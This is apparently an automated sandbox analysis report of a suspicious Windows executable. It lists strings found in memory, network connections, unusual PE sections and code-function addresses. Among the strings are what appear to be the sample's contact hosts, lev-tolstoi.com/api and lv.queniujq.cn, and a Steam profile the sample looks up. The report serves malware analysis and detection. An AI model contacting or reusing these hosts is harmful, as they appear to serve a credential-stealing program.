      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclD
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.000000000157C000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.000000000157C000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.000000000157C000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbY
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376837194.00000000015F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/button
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: 35K4Py4lii.exe, 00000000.00000002.1378297153.000000000159A000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376764955.0000000001599000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.0000000001597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
      Source: 35K4Py4lii.exe, 00000000.00000002.1378240748.0000000001582000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/900
      Source: 35K4Py4lii.exe, 00000000.00000002.1378297153.000000000159A000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376764955.0000000001599000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.0000000001597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api/
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/j
      Source: 35K4Py4lii.exe, 00000000.00000002.1378240748.0000000001582000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376602406.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.000000000157C000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378140575.0000000001578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: 35K4Py4lii.exe, 00000000.00000003.1364875747.00000000015F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: 35K4Py4lii.exe, 00000000.00000003.1376602406.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000002.1378342246.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, 35K4Py4lii.exe, 00000000.00000003.1376857354.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49705 version: TLS 1.2

      System Summary

      barindex
      PE file contains section with special chars
      Source: 35K4Py4lii.exeStatic PE information: section name:
      Source: 35K4Py4lii.exeStatic PE information: section name: .idata
      Source: 35K4Py4lii.exeStatic PE information: section name:
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000B86000_2_000B8600
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000BB1000_2_000BB100
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0019601A0_2_0019601A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0025A0230_2_0025A023
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001460000_2_00146000
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001300270_2_00130027
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001420290_2_00142029
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001A00270_2_001A0027
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0015E0570_2_0015E057
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001440770_2_00144077
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0026004C0_2_0026004C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0013E0680_2_0013E068
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002220590_2_00222059
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001E008F0_2_001E008F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000DC09E0_2_000DC09E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001B00850_2_001B0085
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002780870_2_00278087
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002320810_2_00232081
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0017A0A40_2_0017A0A4
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002140980_2_00214098
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000DA0CA0_2_000DA0CA
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001760C70_2_001760C7
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001CA0CF0_2_001CA0CF
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0020A0C20_2_0020A0C2
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000C60E90_2_000C60E9
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001FA0F80_2_001FA0F8
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0025C0C20_2_0025C0C2
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000DC0E60_2_000DC0E6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002480CA0_2_002480CA
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001F60F00_2_001F60F0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0016A0E70_2_0016A0E7
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0020E0D10_2_0020E0D1
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001AC0EF0_2_001AC0EF
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002240D50_2_002240D5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0015C0E90_2_0015C0E9
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001D21180_2_001D2118
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0013811F0_2_0013811F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0013C1060_2_0013C106
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001341050_2_00134105
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0025613F0_2_0025613F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002261000_2_00226100
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0011613A0_2_0011613A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001FE12F0_2_001FE12F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001B412A0_2_001B412A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001C012F0_2_001C012F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0015412E0_2_0015412E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0019C15C0_2_0019C15C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0026E1600_2_0026E160
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0011A1590_2_0011A159
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0014A15D0_2_0014A15D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001DA1540_2_001DA154
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_002581680_2_00258168
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0025E16A0_2_0025E16A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000DC09E0_2_000DC09E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001361460_2_00136146
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001121720_2_00112172
